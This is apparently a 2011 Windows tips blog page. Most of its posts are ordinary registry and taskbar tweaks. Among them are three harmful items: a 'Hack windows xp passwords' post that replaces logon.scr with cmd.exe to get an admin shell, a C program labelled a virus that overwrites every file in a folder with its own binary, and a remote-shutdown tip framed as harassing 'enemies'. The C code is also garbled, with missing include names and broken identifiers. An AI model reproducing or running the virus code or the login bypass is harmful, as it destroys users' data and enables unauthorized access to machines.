Friday, April 22, 2011

Delete Recent Documents history

Any document that you open in Windows is added to the Recent Documents list. Now with this simple trick you can stop that!!!

* Start ==> Run ==> Type "Regedit"

* [HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer]

* Right Click on the right Pane and create a new DWORD value.

* Assign Value Name as "NoRecentDocsHistory"

* Data Type as "REG_DWORD (DWORD Value)"

* If Value Data = 0 : disable restriction
1 : enable restriction

Lock The Computer In a Click

Try this and create the icon to lock the machine on your desktop.

1. Right click an empty spot on the desktop, point to New and click Shortcut.

2. In the Create Shortcut dialog box, copy the following into the 'Type the location' of the item text box:

rundll32 user32.dll,LockWorkStation


3. Click Next.

4. In "Type a name for this shortcut", type LOCK and Click Finish

5. Now just double click on that icon to lock your computer without pressing Alt+Ctrl+Del.

Hack windows xp passwords

Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
Wait its not [...]

Friday, April 8, 2011

VIRUS CODE IN C

/*this is a simple program to create a virus in c
it will create folder in a folder in a folder and so on run this on your own responsibility*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Put Control Panel to Windows 7 TaskBar Hack

Here are the steps you need to follow in order to pin the Control Panel to Windows 7
Step 1: Open the Control Panel
Step 2: You can see the Control Panel button displayed on the Windows 7 Taskbar.

Step 3: Right click on the Control Panel icon on the Taskbar and choose the Pin this program to taskbar option.
Step 4: Close the Control Panel
You are done, the Control Panel button has been pinned on the Taskbar
How to Unpin this program from taskbar
In case you want to unpin the Control Panel from Taskbar, right click and select the Unpin this program from taskbar

Renaming the Windows Logon Box

Rename the Windows Logon box, just follow the simple steps.
Run regedit and go to HKEY_Local_Machine\Software\Microsoft \Windows\CurrentVersion\Winlogon
Then add or change the key:
LegalNoticeCaption REG_SZ="(Title for Box)"
And the same for this key:
LegalNoticeText REG_SZ="(Message to be displayed in the box)"

Restarting Windows without Restarting the Computer

When you click on the SHUTDOWN button, make sure to simultaneous press SHIFT Button. If you hold the Shift key down while clicking on SHUTDOWN button, you computer would restart without restarting the Computer. This is equivalent to term “HOT REBOOT”.

Shut Down Remote Computer

Windows NT comes with a Resource kit with the files SHUTCMD.exe.

This can be used in a variety of ways to play with your enemies computer. Just download and install the resource kit in the "Service Pack 6a".

Follow the below commands to start off:

* SHUTCMD \L -- Shuts down the local computer

* SHUTCMD \\Computer Name /Y -- Shuts down the remote computer specified their IP address

How to Get Windows Vista-Style Taskbar in Window7

It's hard to deny that Windows Vista scores high on appearance. Here's your chance to give the Windows 7 a Vista look. Just follow the steps mentioned below

Step 1: Right-click on the taskbar and choose the properties dialog. Select the small icons checkbox

Step 2: Under the taskbar buttons setting, choose combine when taskbar is full. Although it’s not
 
pixel-perfect in accuracy, but, it’s close from a functionality point